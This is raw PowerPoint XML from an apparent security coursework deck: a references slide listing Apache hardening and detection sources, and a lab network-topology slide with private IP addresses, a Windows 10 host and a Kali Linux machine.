            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Roboto Medium" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto Medium" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Subtitle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26F40B75-2031-1FD7-3DCD-72EAFD7008FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C30B0A3-D928-104B-1C82-E52B29176FA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://unix.stackexchange.com/questions/345114/how-to-protect-against-port-scanners</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.simplified.guide/apache/disable-directory-listing</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Prebuilt job reference | Elastic Security Solution [8.3] | Elastic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Manage detection rules | Elastic Security Solution [8.3] | Elastic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Essential Eight Maturity Model | Cyber.gov.au</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Top 10 Web Hosting Security Best Practices (imunify360.com)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>What Is WebDAV? A Quick Guide to a Handy Protocol (cloudwards.net)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>14-Step Best Practices Checklist to Improve Apache Security (wp-bridge.com)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Security Tips - Apache HTTP Server Version 2.4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>How to Configure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>mod_evasive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t> for Apache DDoS Protection (howtogeek.com)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>https://www.elastic.co/guide/en/security/current/detection-engine-overview.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>List of Apache modules – Wikipedia</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>https://cwiki.apache.org/confluence/display/httpd/CommonHTTPStatusCodes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>jzdziarski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>/mod_evasive: Apache mod_evasive module (github.com)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF (defense.gov)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>Preventing Shell Upload Vulnerabilities in PHP (securityinnovation.com)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t> - How to ban all executable files on Apache - Stack Overflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>Versions of Apache Http Server : Versions and number of related security vulnerabilities (cvedetails.com)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>Apache Web Server Hardening and Security Guide (geekflare.com)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="482600" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1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848161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5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Network Topology </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052" name="Google Shape;1052;p5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57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115375" y="910475"/>
            <a:ext cx="6699600" cy="3897600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14530"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1058" name="Google Shape;1058;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056300" y="910475"/>
            <a:ext cx="1814100" cy="38976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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0"/>
              <a:t>Address Range: 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0"/>
              <a:t>Netmask:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0"/>
              <a:t>255.255.255.0</a:t>
            </a:r>
            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0"/>
              <a:t>Gateway: 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr sz="900" dirty="0">
              <a:latin typeface="Roboto Black"/>
              <a:ea typeface="Roboto Black"/>
              <a:cs typeface="Roboto Black"/>
              <a:sym typeface="Roboto Black"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0"/>
              <a:t>IPv4: 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0"/>
              <a:t>OS: Windows 10</a:t>
            </a:r>
            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0"/>
              <a:t>Hostname: VM-REFVM-684427</a:t>
            </a:r>
            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0"/>
              <a:t>IPv4: 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900" dirty="0"/>
              <a:t>OS: Kali Linux Debian 5</a:t>
            </a:r>
